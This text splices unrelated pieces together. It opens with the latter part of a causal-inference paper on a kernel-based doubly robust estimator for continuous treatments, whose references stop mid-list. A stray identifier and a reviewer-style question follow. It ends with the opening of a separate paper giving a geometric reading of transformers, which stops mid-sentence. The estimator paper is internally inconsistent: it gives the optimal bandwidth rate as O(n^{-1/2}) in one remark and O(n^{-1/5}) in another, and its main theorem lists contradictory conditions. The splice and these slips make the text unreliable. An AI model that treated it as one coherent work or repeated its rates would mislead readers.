suppose \( \beta(a) = \mathbb{E}[I(A = a) q_0(a, Z, X) Y] \) is continuous and bounded uniformly respect to \( a \), then we have \[ \mathbb{E}[Y(a)] = \mathbb{E}[I(A = a) q_0(a, Z, X) Y] = \lim_{h_{bw} \to 0} \mathbb{E}[K_{h_{bw}}(A - a) q_0(a, Z, X) Y]. \] Remark 4.3. The kernel function has been widely used in machine learning applications [Kallus & Zhou, 2018; Kallus & Uehara, 2020; Colangelo & Lee, 2020; Klosin, 2021]. Different from these works, we are the first to integrate them into the proximal estimation to handle continuous treatments. Remark 4.4. The choice of bandwidth \( h_{bw} \) is a trade-off between bias and variance. When \( h_{bw} \) is small, the kernel estimator has less bias as shown in Thm. 4.2 however, will increase the variance. In Sec. 6, we show that the optimal rate for \( h_{bw} \) is \( O(n^{-1/2}) \), which leads to the MSE converges at a rate of \( O(n^{-4/5}) \) for our kernel-based doubly robust estimator. Similar to Eq. [6], we can therefore derive the Proximal Kernel Doubly Robust (PKDR) estimator as: $$\hat{\beta}(a) = \frac{1}{nh_{bw}} \sum_{i=1}^{n} K \left( \frac{a_i - a}{h_{bw}} \right) \left( y_i - h_0(a, w_i, x_i) \right) q_0(a, z_i, x_i) + h_0(a, w_i, x_i).$$ (7) Similar to Thm. [4.2], we can also show that this estimator is unbiased as $h_{bw} \to 0$. In the subsequent section, we show that this estimator in Eq. [7] can also be derived from the smooth approximation of the influence function of $\beta(a)$. ### 4.2 Influence Function under Continuous Treatments In this section, we employ the method of Gateaux derivative (Carone et al., 2018; Ichimura & Newey, 2022) to derive the influence function of $\beta(a)$. (For our non-regular parameters, we borrow the terminology “influence function” in estimating a regular parameter. See Hampel (Ichimura & Newey, 2022), for example.) Specifically, we denote $P_X$ as the distribution function for any variable $X$, and rewrite $\beta(a)$ as $\beta(a; P_O^0)$ where $P_O^0$ denotes the true distribution for $O := (A, Z, W, X, Y)$. Besides, we consider the special submodel $P_O^{h_{bw}} = (1 - \varepsilon)P_O^0 + \varepsilon P_O^{h_{bw}}$, where $P_O^{h_{bw}}(\cdot)$ maps a point $o$ to a distribution of $O$, i.e., $P_O^{h_{bw}}(o)$ for a fixed $o$ denotes the distribution of $O$ that approximates to a point mass at $o$. Different types of $P_O^{h_{bw}}(o)$ lead to different forms of Gateaux derivative. In our paper, we choose the distribution $P_O^{h_{bw}}(o)$ whose corresponding probability density function (pdf) $p_O^{h_{bw}}(o) = K_{h_{bw}}(O - o)I(p_O^0(o) > h_{bw})$, which has $\lim_{h_{bw} \to 0} p_O^{h_{bw}}(o) = \lim_{h_{bw} \to 0} K_{h_{bw}}(O - o)$. We can then calculate the limit of the Gateaux derivative (Ichimura & Newey, 2022) of the functional $\beta(a; P_O^{h_{bw}})$ with respect to a deviation $P_O^{h_{bw}} - P_O^0$. The following theorem shows that our kernel-based doubly robust estimator corresponds to the influence function: **Theorem 4.5.** Under a nonparametric model, the limit of the Gateaux derivative is $$\lim_{h_{bw} \to 0} \frac{\partial}{\partial \varepsilon} \beta(a; P_O^{h_{bw}}) \bigg|_{\varepsilon = 0} = (Y - h_0(a, W, X)) q_0(a, Z, X) \lim_{h_{bw} \to 0} K_{h_{bw}}(A - a) + h_0(a, W, X) - \beta(a).$$ **Remark 4.6.** For binary treatments, the DR estimator with the indicator function in Eq. [4] corresponds to the efficient influence function, as derived within the non-parametric framework (Cui et al., 2023). Different from previous works (Colangelo & Lee, 2020), deriving the influence function within the proximal causal framework is much more challenging as it involves the Gateau derivatives for nuisance functions $h_0, q_0$ that have implicit functional forms. By employing our estimator, even when the unconfoundedness assumption from Colangelo & Lee (2020) is not satisfied, we can still effectively obtain causal effects. ### 5 Nuisance Function Estimation In this section, we propose to solve $h_0, q_0$ from integral equations Eq. [2],[3] for continuous treatments. We first introduce the estimation of $q_0$. Previous methods (Kallus et al., 2021; Ghassami et al., 2022) solved $q_0(a, Z, X)$ by running an optimization algorithm for each $a = 0, 1$. However, it is computationally infeasible for continuous treatments. Please see Appx. D.2 for detailed comparison. Instead of running an optimization for each $a$, we would like to estimate $q_0(A, Z, X)$ with a single optimization algorithm. To achieve this goal, we propose a two-stage estimation algorithm. We first estimate the policy function $p(A|w, x)$ and plug into Eq. [3]. To efficiently solve $q_0$, we note that it is equivalent to minimize the residual mean squared error denoted as $L_q(q; p) = \mathbb{E}[(R_q(q, p))^2]$. According to the lemma shown below, such a mean squared error can be reformulated into a maximization-style optimization, thereby converting into a min-max optimization problem. **Lemma 5.1.** Denote $\|f(X)\|^2_{L_2} := \mathbb{E}[f^2(X)]$. For any parameter $\lambda_m > 0$, we have $$L_q(q; p) = \sup_{m \in M} \mathbb{E}[m(A, W, X)(q_0(A, Z, X) - 1/p(A|W, X))] - \lambda_m \|m(A, W, X)\|^2_{L_2},$$ where $M$ is the space of continuous functions over $(A, W, X)$. We leave the proof in Appx. D. Motivated by Lemma 5.1, we can solve $q_0$ via the following min-max optimization: $$\min_{q \in Q} \max_{m \in M} \Phi_{q, \lambda_m}(q, m; p) := \frac{1}{n} \sum_{i} \left( q(a_i, z_i, x_i) - \frac{1}{p(a_i|w_i, x_i)} \right) m(a_i, w_i, x_i) - \lambda_m \|m\|^2_{2,n},$$ (8) where $\lambda_m \|m\|_{2,n}^2$ is called stabilizer with $\|m\|_{2,n}^2 := \frac{1}{n} \sum_i m^2(a_i, w_i, x_i)$. We can parameterize $q$ and $m$ as reproducing kernel Hilbert space (RKHS) with kernel function to solve the min-max problem. We derive their closed solutions in the Appendix E. Besides, we can also use Generative Adversarial Networks (Goodfellow et al., 2014) to solve this problem. **Estimating the policy function** $p(A = a | w, x)$. To optimize Eq. 8, we should first estimate $p(a | w, x)$. Several methods can be used for this estimation, such as the kernel density estimation and normalizing flows (Chen, 2017; Bishop, 1994; Ambrogioni et al., 2017; Sohn et al., 2015; Rezende & Mohamed, 2015; Dinh et al., 2016). In this paper, we employ the kernel density function (Chen, 2017) that has been shown to be effective in low-dimension scenarios. When the dimension of $(W, X)$ is high, we employ the conditional normalizing flows (CNFs), which have been shown to be universal density approximator (Durkan et al., 2019) and thus can be applied to complex scenarios. **Nuisance function** $h_0$. Since the estimation of $h_0$ does not involve indicator functions, we can apply many off-the-shelf optimization approaches derived from conditional moment equations, such as two-stage penalized regression (Singh, 2020; Mastouri et al., 2021; Xu et al., 2021), maximum moment restriction (Zhang et al., 2020; Muandet et al., 2020a), and minimax optimization (Dikkala et al., 2020; Muandet et al., 2020b). To align well with $q_0$, here we choose to estimate $h_0$ via the following min-max optimization problem that has been derived in Kallus et al. (2021): $$\min_{h \in H} \max_{g \in G} \Phi_h^{n,\lambda_g}(h, g) := \frac{1}{n} \sum_i g(a_i, z_i, x_i)(y_i - h(a_i, w_i, x_i)) - \lambda_g \|g\|_{2,n}^2,$$ (9) where $H$ and $G$ respectively denote the bridge functional class and the critic functional class. ### 6 THEORETICAL RESULTS In this section, we provide convergence analysis of Eq. 8, 9 for nuisance functions $h_0, q_0$, as well as for the causal effect $\beta(a)$ with the PKDR estimator in Eq. 7. We first provide convergence analysis for $q_0$, while the result for $h_0$ is similar and left to the Appx. E. Different from previous works (Dikkala et al., 2020; Ghassami et al., 2022), our analysis encounters a significant challenge arising from the estimation error inherent in the propensity score function. By addressing this challenge, our result can effectively account for this estimation error. Formally speaking, we consider the projected residual mean squared error (RMSE) $\mathbb{E}[\text{proj}_q(\hat{q} - q_0)^2]$, where $\text{proj}_q(\cdot) := \mathbb{E}[\cdot | A, W, X]$. Before presenting our results, we first introduce the assumption regarding the critic functional class in $M$, which has been similarly made in Dikkala et al. (2020); Ghassami et al. (2022); Qi et al. (2023). **Assumption 6.1.** (1) (Boundness) $\|Q\|_\infty < \infty$ and $\hat{p}$ is uniformly bounded; (2) (Symmetric) $M$ is a symmetric class, i.e., if $m \in M$, then $-m \in M$; (3) (Star-shaped) $M$ is star-shaped class, that is for each function $m$ in the class, $\alpha m$ for any $\alpha \in [0, 1]$ also belongs to the class; (4) (Realizability) $q_0 \in Q$; (5) (Closedness) $\frac{1}{2\lambda_m} \text{proj}_q(q - q_0) \in M$. Under assumption 6.1, we have the following convergence result in terms of $\|\text{proj}_q(\hat{q} - q_0)\|_{L^2}$. **Theorem 6.2.** Let $\delta_n^q$ respectively be the upper bound on the Rademacher complexity of $M$. For any $\eta \in (0, 1)$, define $\delta_n^q := \delta_n^q + c_0^q \sqrt{\log(c_1^q/\eta)/n}$ for some constants $c_0^q, c_1^q$; then under assum. 6.1 we have with probability $1 - \eta$ that $$\|\text{proj}_q(\hat{q} - q_0)\|_2 = O\left(\delta_n^q \sqrt{\lambda_m^2 + \lambda_m + 1} + \left\|\frac{1}{p} - \frac{1}{\hat{p}}\right\|_2\right),$$ $p$ stands for $p(a | w, x)$. **Remark 6.3.** Inspired by Chen & Pouzo (2012); Dikkala et al. (2020); Kallus et al. (2021), we can obtain the same upper bound for the RMSE $\|\hat{q} - q_0\|_2$, up to a measure of ill-posedness denoted as $\tau_q := \sup_{q \in Q} \|\hat{q} - q_0\|_2 / \|\text{proj}_q(q - q_0)\|_2 < \infty$. The bound mentioned above comprises two components. The first part pertains to the estimation of $q$, while the second part concerns the estimation of $1/p$. The first part is mainly occupied by the Rademacher complexity $\delta_n^q$, which can attain $O(n^{-1/4})$ if we parameterize $M$ as bounded metric entropy such as Holder balls, Sobolev balls, and RKHSs. For the second part, we can also achieve $O(n^{-1/4})$ for $\|1/p - 1/\hat{p}\|_2$ under some conditions (Chernozhukov et al., 2022; Klosin, 2021; Colangelo & Lee, 2020). Now we are ready to present the convergence result for $\beta(a)$ within the proximal causal framework. **Theorem 6.4.** Under assumptions 3.1, 3.4, and 4.1 suppose $\|\hat{h} - h\|_2 = o(1)$, $\|\hat{q} - q\|_2 = o(1)$ and $\|\hat{h} - h\|_2 \|\hat{q} - q\|_2 = o((nh_{bw})^{-1/5})$, $nh_{bw} = O(1)$, $nh_{bw} \to \infty$, $h_0(a, w, x), p(a, z | w, x)$ and $p(a, w | z, x)$ are twice continuously differentiable wrt $a$ as well as $h_0, q_0, \hat{h}, \hat{q}$ are uniformly bounded. Then for any $a$, we have the following for the bias and variance of the PKDR estimator given Eq. 7: $$ \text{Bias}(\hat{\beta}(a)) := \mathbb{E}[\hat{\beta}(a)] - \beta(a) = \frac{h_{bw}^2}{2} \kappa_2(K) B + o((nh_{bw})^{-1/2}), \quad \text{Var}[\hat{\beta}(a)] = \frac{\Omega_2(K)}{nh_{bw}} (V + o(1)), $$ where $B = \mathbb{E}[q_0(a, Z, X)][2 \frac{\partial}{\partial A} h_0(a, W, X) \frac{\partial}{\partial A} p(a, W | Z, X) + \frac{\partial^2}{\partial A^2} h_0(a, W, X)]$, $V = \mathbb{E}[(A = a)q_0(a, Z, X)^2(Y - h_0(a, W, X))^2]$. **Remark 6.5.** The smoothness condition can hold for a broad family of distributions and be thus similarly made for kernel-based methods (Kallus & Zhou, 2018; Kallus & Uehara, 2020). According to Thm. 6.2, we have $\|\hat{h} - h_0\|_2 = O(n^{-1/4})$ and $\|\hat{q} - q_0\|_2 = O(n^{-1/4})$, thus can satisfy the consistency condition required as long as $h_{bw} = o(1)$. Besides, we show in Thm. E.9 in Appx. E.5 that this estimator is $n^{2/5}$-consistent. From Thm. 6.4, we know that the optimal bandwidth is $h_{bw} = O(n^{-1/5})$ in terms of MES that converges at the rate of $O(n^{-4/5})$. Note that this rate is slower than the optimal rate $O(n^{-1})$, which is a reasonable sacrifice to handle continuous treatment within the proximal causal framework and agrees with existing studies (Kennedy et al., 2017; Colangelo & Lee, 2020). ### 7 EXPERIMENTS In this section, we evaluate the effectiveness of our method using two sets of synthetic data — one in a low-dimensional context and the other in a high-dimensional context — as well as the legalized abortion and crime dataset (Donohue III & Levitt, 2001). In Appx. G, we conduct experiments on more benchmark datasets, including time-series forecasting. **Compared baselines.** We compare our method with the following baselines that use only $h_0$ for estimation, i.e., $\hat{\beta}(a) = \frac{1}{n} \sum_{i=1}^{n} h_0(a_i, w_i, x_i)$: i) Proximal Outcome Regression (POR) that solved Eq. 9 for estimation; ii) PMMR (Mastouri et al., 2021) that employed the Maximal Moment Restriction (MMR) framework to estimate the bridge function via kernel learning; iii) KPV (Mastouri et al., 2021) that used two-stage kernel regression; iv) DFPV (Xu et al., 2021) that used deep neural networks to model high-dimensional nonlinear relationships between proxies and outcomes; v) MINMAX (Dikkala et al., 2020) that used Generate adversarial networks to solve Eq. 9; vi) NMMR (Kompa et al., 2022) that introduced data-adaptive kernel functions derived from neural networks. For our method, we implement the Inverse probability weighting (IPW) estimator PKIPW that uses $q_0$ for estimation via Eq. 8 and the doubly robust estimator PKDR that used both the nuisance function $h_0$ and $q_0$ to estimate causal effects through Eq. 7. For simplicity, we only present the result of PKDR that uses POR to estimate $h_0$. **Implementation Details.** In the PKPW and PKDR estimators, we choose the second-order Epanechnikov kernel, with bandwidth $h_{bw} = c \hat{\sigma}_A n^{-1/5}$ with estimated std $\hat{\sigma}_A$ and the hyperparameter $c > 0$. In our paper, we vary $c$ over the range $\{0.5, 1, 1.5, \cdots, 4.0\}$ and report the optimal $c$ in terms of cMSE. To estimate nuisance functions, we parameterize $\mathcal{Q}$ and $\mathcal{M}$ (resp., $\mathcal{H}$ and $\mathcal{G}$) via RKHS for $q_0$ (resp., $h_0$), where we use Gaussian kernels with the bandwidth parameters being initialized using the median distance heuristic. For policy estimation, we employ the KDE in the low-dimensional synthetic dataset and the real-world data, while opting for CNFs in the high-dimensional synthetic dataset. We leave more details about hyperparameters in the Appx. H. **Evaluation metrics.** We report the causal Mean Squared Error (cMSE) across 100 equally spaced points in the range of $\text{supp}(A)$: $c\text{MSE} := \frac{1}{100} \sum_{i=1}^{100} (\mathbb{E}[Y^{a_i}] - \hat{\mathbb{E}}[Y^{a_i}])^2$. Here, we respectively take $\text{supp}(A) := [-1, 2], [0, 1], [0, 2]$ in low-dimensional synthetic data, high-dimensional synthetic data, and real-world data. The truth $\mathbb{E}[Y^{a_i}]$ is derived through Monte Carlo simulations comprising 10,000 replicates of data generation for each $a$. Figure 2: ATE comparison of different methods across various methods on three datasets; Left: ATE comparison using 1000 samples in the first experiment; Middle: ATE comparison using 2000 samples in the second experiment; Right: ATE comparison for the abortion and crime dataset. 7.1 Synthetic Study We consider two distinct scenarios. The first scenario demonstrates the effectiveness of the kernel method in the context of the doubly robust estimator under model misspecification, while the second scenario evaluates the utility in high-dimensional settings. For both scenarios, we report the mean cMSE of each method across 20 times. 7.1.1 Doubly Robustness Study Data generation. We follow the generative process in Mastouri et al. (2021) and leave details in the Appx. H. Similar to Kang & Schafer (2007); Cui et al. (2023), we consider four scenarios where either or both confounding bridge functions are misspecified by considering a model using a transformation of observed variables: - **Scenario 1.** We follow Mastouri et al. (2021) to generate data; - **Scenario 2.** The outcome confounding bridge function is misspecified with $W^* = |W|^{1/2} + 1$; - **Scenario 3.** The treatment confounding bridge function is misspecified with $Z^* = |Z|^{1/2} + 1$; - **Scenario 4.** Both confounding bridge functions are mis-specified. Table 1: cMSE of all methods on two synthetic data and the real-world data. | Dataset | Size | PMMR | KPV | DFPV | MINMAX | NMMR | POR | PKIPW | PKDR | |------------------|------|--------|--------|--------|--------|--------|--------|--------|--------| | Doubly Robust | | | | | | | | | | | Scenario 1 | 500 | 0.16±0.05 | 0.37±0.26 | 0.30±0.13 | 0.20±0.15 | 0.29±0.11 | 0.19±0.11 | 0.11±0.06 | 0.11±0.06 | | | 1000 | 0.14±0.03 | 0.21±0.09 | 0.26±0.06 | 0.10±0.05 | 0.25±0.09 | 0.16±0.10 | 0.11±0.08 | 0.16±0.04 | | Scenario 2 | 500 | 3.32±0.06 | 3.50±0.16 | 1.01±0.19 | 7.48±2.05 | 4.72±1.38 | 3.47±0.08 | 0.10±0.11 | 0.16±0.11 | | | 1000 | 3.32±0.06 | 3.49±0.19 | 1.97±0.18 | 5.27±0.96 | 5.71±1.10 | 3.48±0.07 | 0.20±0.14 | 0.24±0.19 | | Scenario 3 | 500 | 0.15±0.05 | 0.29±0.18 | 0.28±0.13 | 0.35±0.26 | 0.38±0.15 | 0.20±0.12 | 2.39±0.60 | 0.20±0.15 | | | 1000 | 0.14±0.03 | 0.20±0.08 | 0.30±0.10 | 0.27±0.13 | 0.47±0.37 | 0.22±0.14 | 2.15±0.90 | 0.19±0.10 | | Scenario 4 | 500 | 3.32±0.05 | 3.51±0.21 | 1.00±0.22 | 0.69±1.03 | 5.60±1.26 | 3.46±0.08 | 2.91±0.58 | 3.38±0.53 | | | 1000 | 3.29±0.03 | 3.46±0.14 | 1.02±0.23 | 5.10±0.90 | 5.65±1.51 | 3.44±0.07 | 1.87±0.91 | 3.56±3.07 | | High Dimension | 500 | 0.74±0.06 | 0.34±0.06 | 0.22±0.11 | 0.12±0.07 | 0.14±0.05 | 0.31±0.07 | 0.20±0.03 | 0.08±0.04 | | | 1000 | 0.69±0.05 | 0.36±0.02 | 0.24±0.09 | 0.07±0.03 | 0.05±0.04 | 0.30±0.08 | 0.19±0.03 | 0.09±0.04 | | Abort. & Crim | 1500 | 0.02±0.00 | 0.03±0.01 | 0.07±0.05 | 0.05±0.00 | 0.01±0.01 | 0.01±0.00 | 0.04±0.02 | 0.02±0.00 | Results. We present the mean and the standard deviation (std) of cMSE over 20 times across four scenarios, as depicted in Fig. 2 and Tab. 1. For each scenario, we consider two sample sizes, 500 and 1,000. In the first scenario, our PKDR is comparable and even better than the estimator based on $h$. For scenarios with misspecification, the PKIPW estimator and the baselines with only $h_0$ respectively perform well in scenario 2 and scenario 3. Notably, the PKDR can constantly perform well in these scenarios, due to its doubly robustness against model mis-specifications. In scenario 4 where both models of $h_0$ and $q_0$ are misspecified, all methods suffer from a large error. Besides, we can see that the PKIPW method has a large variance in scenario 4, where both estimations of the policy function and $q_0$ can be inaccurate due to mis-specifications (Robins et al., 2007; Jiang et al., 2022). It is worth mentioning that compared to others, DFPV exhibits minimal errors in scenario 4. This could be attributed to their approach of individually fitting each variable’s kernel function using different neural networks, thereby enhancing flexibility in their models. Sensitivity Analysis. According to Thm. 6.4, $h_{bw}$ is the trade-off between bias and variance. To show this, we report the cMSE as $c$ in $h_{bw} := c\hat{\sigma}_A n^{-1/5}$ varies in $\{0.5, 1.0, 1.5, ..., 4.0\}$. As $c$ (i.e., increases, the cMSE first decreases, then rises, and reaches its optimum at \( c = 1.5 \), which is consistent with the optimal value derived in Kallus et al. (2021). Figure 3: Sensitive analysis of \( c \) in \( h_{bw} = c \hat{\sigma}_A n^{-1/5} \) in PKIPW (left) and PKDR (right) estimators. ### 7.1.2 High Dimensional Study **Data generation.** We follow Colangelo & Lee (2020); Singh (2020) to generate data, in which we set \( \text{dim}(X) = 100 \), \( \text{dim}(Z) = 10 \), and \( \text{dim}(W) = 10 \). Specifically, we set \( X \sim N(0, \Sigma) \) with \( \Sigma \in \mathbb{R}^{100 \times 100} \) has \( \Sigma_{ii} = 1 \) for \( i \in [\text{dim}(X)] \) and \( \Sigma_{ij} = \frac{1}{2} \cdot \|i - j\| = 1 \) for \( i \neq j \). The outcome \( Y \) is generated from \( Y = A^2 + 1.2A + 1.2(X^\top \beta_x + W^\top \beta_w) + AX_1 + 0.25U \), where \( \beta_x, \beta_w \) exhibit quadratic decay, i.e., \( |\beta_x|_j = j^{-2} \). More details can be found in Appx. H. **Results.** We report the mean and std of cMSE over 20 times with sample sizes set to 1,000 and 2,000, as depicted in Fig. 2 and Tab. I. As shown, we find that the ATE curve fitted by PKDR estimator is closest to the real curve, and its cMSE is also the lowest. This result suggests the robustness of our methods against high-dimensional covariates. ### 7.2 Legalized Abortion And Crime We obtain the data from Donohue III & Levitt (2001); Mastouri et al. (2021) that explores the relationship between legalized abortion and crime. In this study, we take the treatment as the effective abortion rate, the outcome variable \( Y \) as the murder rate, the treatment-inducing proxy \( Z \) as the generosity towards families with dependent children, and the outcome-inducing proxies \( W \) as beer consumption per capita, log-prisoner population per capita, and concealed weapons laws. We follow the protocol Woody et al. (2020) to preprocess data. We take the remaining variables as the unobserved confounding variables \( U \). Following Mastouri et al. (2021), the ground-truth value of \( \beta(a) \) is taken from the generative model fitted to the data. **Results.** The results are presented in Fig. 2 and Tab. I. It is evident that all three methods effectively estimate \( \beta(a) \), which suggests the utility of our method in real-world scenarios. However, when \( a \) falls within the range of [1.5, 2], deviations become apparent in the fitted curve. We attribute these deviations to an inadequate sample size as Fig. 2. It’s worth noting that the DFPV method employing Neural Networks (NN) exhibits higher variances. This suggests potential numerical instability in certain experiments, a phenomenon in line with observations made in Kompa et al. (2022). ### 8 Conclusion In this paper, we propose a kernel-based doubly robust estimator for continuous treatments within the proximal causal framework, where we replace the conventional indicator function with a kernel function. Additionally, we propose a more efficient approach to estimating the nuisance function \( q_0 \) by estimating the policy function and incorporating it into a min-max optimization. Our analysis reveals that the MSE converges at a rate of \( O(n^{-4/5}) \) when we select the optimal bandwidth to balance bias and variance. We demonstrate the utility of our PKDR estimator in synthetic as well as the legalized abortion and crime dataset. **Limitation and future works.** Our estimator is required to estimate the policy function, which may lead to a large variance especially when the policy function is mis-specified. Potential solutions include the variance reduction method including the stabilized IPW estimator, whose estimation forms and theoretical analysis will be explored in the future. 9 ACKNOWLEDGMENTS This work was supported by the National Key Research and Development Program of China (No. 2022YFC2405100); STI 2030—Major Projects (No. 2022ZD0205300); Shanghai Municipal Science and Technology Major Project (No.2021SHZDZX0103); the State Key Program of National Natural Science Foundation of China under Grant No. 12331009. The computations in this research were performed using the CFFF platform of Fudan University. REFERENCES Luca Ambrogioni, Umut Güçlü, Marcel AJ van Gerven, and Eric Maris. The kernel mixture network: A nonparametric method for conditional density estimation of continuous random variables. arXiv preprint arXiv:1705.07111, 2017. Heejung Bang and James M Robins. Doubly robust estimation in missing data and causal inference models. Biometrics, 61(4):962–973, 2005. Christopher M Bishop. Mixture density networks. 1994. Marco Carone, Alexander R Luedtke, and Mark J van der Laan. Toward computerized efficient estimation in infinite-dimensional models. Journal of the American Statistical Association, 2018. Marine Carrasco, Jean-Pierre Florens, and Eric Renault. Linear inverse problems in structural econometrics estimation based on spectral decomposition and regularization. Handbook of econometrics, 6:5633–5751, 2007. Xiaohong Chen and Demian Pouzo. Estimation of nonparametric conditional moment models with possibly nonsmooth generalized residuals. Econometrica, 80(1):277–321, 2012. Yen-Chi Chen. A tutorial on kernel density estimation and recent advances. Biostatistics & Epidemiology, 1(1):161–187, 2017. Victor Chernozhukov, Whitney K Newey, and Rahul Singh. Automatic debiased machine learning of causal and structural effects. Econometrica, 90(3):967–1027, 2022. Kyle Colangelo and Ying-Ying Lee. Double debiased machine learning nonparametric inference with continuous treatments. arXiv preprint arXiv:2004.03036, 2020. Yifan Cui, Hongming Pu, Xu Shi, Wang Miao, and Eric Tchetgen Tchetgen. Semiparametric proximal causal inference. Journal of the American Statistical Association, pp. 1–12, 2023. Nishanth Dikkala, Greg Lewis, Lester Mackey, and Vasilis Syrgkanis. Minimax estimation of conditional moment models. Advances in Neural Information Processing Systems, 33:12248–12262, 2020. Laurent Dinh, Jascha Sohl-Dickstein, and Samy Bengio. Density estimation using real nvp. arXiv preprint arXiv:1605.08803, 2016. John J Donohue III and Steven D Levitt. The impact of legalized abortion on crime. The Quarterly Journal of Economics, 116(2):379–420, 2001. Arnaud Doucet, Adam M Johansen, et al. A tutorial on particle filtering and smoothing: Fifteen years later. Handbook of nonlinear filtering, 12(656-704):3, 2009. Conor Durkan, Artur Bekasov, Iain Murray, and George Papamakarios. Neural spline flows. Advances in neural information processing systems, 32, 2019. Dylan J Foster and Vasilis Syrgkanis. Orthogonal statistical learning. arXiv preprint arXiv:1901.09036, 2019. AmirEmad Ghassami, Andrew Ying, Ilya Shpitser, and Eric Tchetgen Tchetgen. Minimax kernel machine learning for a class of doubly robust functionals with application to proximal causal inference. In International Conference on Artificial Intelligence and Statistics, pp. 7210–7239. PMLR, 2022.
cSSHiLnjsJ
* Figure 1 and Figure 4 suggest that work particles travel along the path determined by residual updates, but such a description is very general. Are there more specific properties within the residual updates?
Traveling Words: A Geometric Interpretation of Transformers Anonymous authors Paper under double-blind review Abstract Transformers have significantly advanced the field of natural language processing, but comprehending their internal mechanisms remains a challenge. In this paper, we introduce a novel geometric perspective that elucidates the inner mechanisms of transformer operations. Our primary contribution is illustrating how layer normalization confines the latent features of the transformer to a hyper-sphere, subsequently enabling attention to mold the semantic representation of words on this surface. This geometric viewpoint seamlessly connects established properties such as iterative refinement and contextual embeddings. We validate our insights by probing a pre-trained 124M parameter GPT-2 model. Our findings reveal clear query-key attention patterns in early layers and build upon prior observations regarding the subject-specific nature of attention heads at deeper layers. Harnessing these geometric insights, we present an intuitive understanding of transformers, depicting iterative refinement as a process that models the trajectory of word particles along the surface of a hyper-sphere. 1 Introduction The transformer architecture (Vaswani et al., 2017) has sparked a significant shift in Artificial Intelligence (AI). It is the central component behind some of the most advanced conversational AI systems (Brown et al., 2020; Thopilan et al., 2022; Bai et al., 2022), and has been established as state-of-the-art for Natural Language Processing (NLP), Computer Vision (CV) and Robotics applications, and many other tasks (OpenAI, 2023; Google, 2023; Chen et al., 2023; Zong et al., 2022; Driess et al., 2023). Recent work on the interpretability of the transformer architecture has focused on analyzing weights in relation to the word embedding space used in its input and output layers (Dar et al., 2022; Elhage et al., 2021; Geva et al., 2022; Brody et al., 2023; Windsor, 2022; Millidge & Black, 2022). Elhage et al. (2021) introduces “Transformer Circuits”, a theoretical framework that decomposes the transformer computation into two main components: a residual stream that carries information from input to output layers and attention/feed-forward updates that modify the information flowing in the residual stream. A key development from their work is grouping attention matrices into the virtual interaction matrices $W_{QK}$ and $W_{OV}$, exploring their role in updating the information carried throughout the transformer’s residual stream. Geva et al. (2022) demonstrate that the updates from the feed-forward module can be decomposed into a linear combination of sub-updates. Figure 1: Overview of the proposed geometric interpretation of Transformers. The input token “Traveling” is embedded as a word particle onto a hyper-sphere, and residual updates determine the path that the particle will follow along the surface, culminating on the region closest to the next token: “Words”. given by the weight matrix of the feed-forward module’s second layer. This matrix directly interacts with the residual stream and allows the authors to measure the impact of each sub-update on the model’s final prediction using the matrix $W_E$ as a probe. Dar et al. (2022) incorporate these ideas to show that it is not only possible to interpret the outcomes of each transformer operation in relation to its latent space but also the weights themselves, enabling them to do zero-shot model stitching by “translating” between latent spaces of different language models. Finally, Millidge & Black (2022) note that analysis on the singular vectors of the $W_{OV}$ matrix provides better practical results when compared to analysis of its row and column weights. A complimentary perspective to the line of work on Transformer Circuits comes from the geometric interpretation of layer normalization (Ba et al., 2016) by Brody et al. (2023). The authors prove that layer normalization is equivalent to projecting features onto the hyperplane defined by the $\vec{1}$ vector and then scaling the projection by $\sqrt{d}$. They show that these properties are crucial for the attention mechanism to either attend to all keys equally or to avoid the problem of having “unselectable” keys (relevant keys within the convex hull of a set of non-relevant keys). The study by Windsor (2022) offers additional evidence for the representational power of layer normalization, visualizing the highly non-linear behavior resulting from this operation and demonstrating that, when employed as an activation function in a neural network, layer normalization can solve complex classification tasks. In this work, we build upon these two perspectives to propose a novel geometric interpretation of transformers. In subsection 2.1, we introduce an alternative equation for layer normalization based on its geometric properties. In subsection 2.2 and subsection 2.3, we discuss the implications of this equation on the attention module, its impact on the transformer’s output probabilities and how it relates to the concept of iterative refinement. Finally, we provide results on our probing experiments in section 3, demonstrating the benefits of our approach on interpretability. An illustrated summary of the proposed geometric interpretation is given in Figure 1. 2 TRANSFORMERS AS A COMPOSITION OF GEOMETRIC PRIMITIVES In this section, we analyze each of the transformer’s components from a geometric perspective, leveraging the interpretation of one component to analyze the next. We begin with the layer normalization function, for which we demonstrate that it constrains $d$-dimensional input features to lie within the surface of a $(d - 1)$ dimensional hyper-sphere. Then we consider the role of the $W_{QK}$ matrix in terms of geometric transformations on said hyper-sphere, and the $W_{VO}$ matrix as a key-value mapping from the hyper-sphere back to $\mathbb{R}^d$, highlighting its similarities with the key-value interpretation of the feed-forward module proposed by Geva et al. (2021). Finally, we discuss the role of the embedding matrix $W_E$ on the transformer’s output probabilities. 2.1 LAYER NORMALIZATION In its original formulation (Ba et al., 2016), layer normalization is introduced using the mean $\mu$ and standard deviation $\sigma$ computed along the dimensions of an input vector $x \in \mathbb{R}^d$: $$\text{LayerNorm}(x) = \frac{x - \mu}{\sigma}$$ (1) However, recent work by Brody et al. (2023) presents an alternate perspective on layer normalization, interpreting it as the composition of two distinct geometric transformations. The difference $x - \mu$ is shown to be orthogonal to the $\vec{1}$ vector, suggesting that the features of the input vector are projected onto a hyperplane $\mathcal{H}$ defined by the normal vector $\vec{1}$, and the denominator $\sigma$ is formulated in terms of the norm of the projected vector as follows: $$\sigma = \frac{1}{\sqrt{d}} \|x - \mu\|$$ (2) Building on this insight, we demonstrate (Appendix A) that the mean $\mu$ is the projection of $x$ onto the vector $\frac{1}{\sqrt{d}} \vec{1}$, as opposed to directly onto $\vec{1}$. This finding simplifies the computation of the projection of $x$ onto the hyperplane $\mathcal{H}$: \[ \text{proj}_H(x) = x - \text{proj}(x, \frac{1}{\sqrt{d}} \mathbf{1}) \\ = x - \mu \] (3) Incorporating Equation 2 and 3 into Equation 1, we obtain a geometric formula for layer normalization: \[ \text{LayerNorm}(x) = \sqrt{d} \frac{\text{proj}_H(x)}{\|\text{proj}_H(x)\|_2} \] (4) Intuitively, layer normalization projects a vector \(x \in \mathbb{R}^d\) to the hyperplane \(H\) perpendicular to \(\frac{1}{\sqrt{d}} \mathbf{1} \in \mathbb{R}^d\), and normalizes the projection such that it lies on the surface of a \(d-1\) dimensional hyper-sphere of radius \(\sqrt{d}\) (for a visual understanding of this transformation with \(d = 3\), refer to Figure 2). Furthermore, layer normalization typically incorporates a scaling factor \(\gamma\) and a bias term \(\beta\). The scaling factor \(\gamma\) acts along each coordinate axis, transforming the hyper-sphere into a 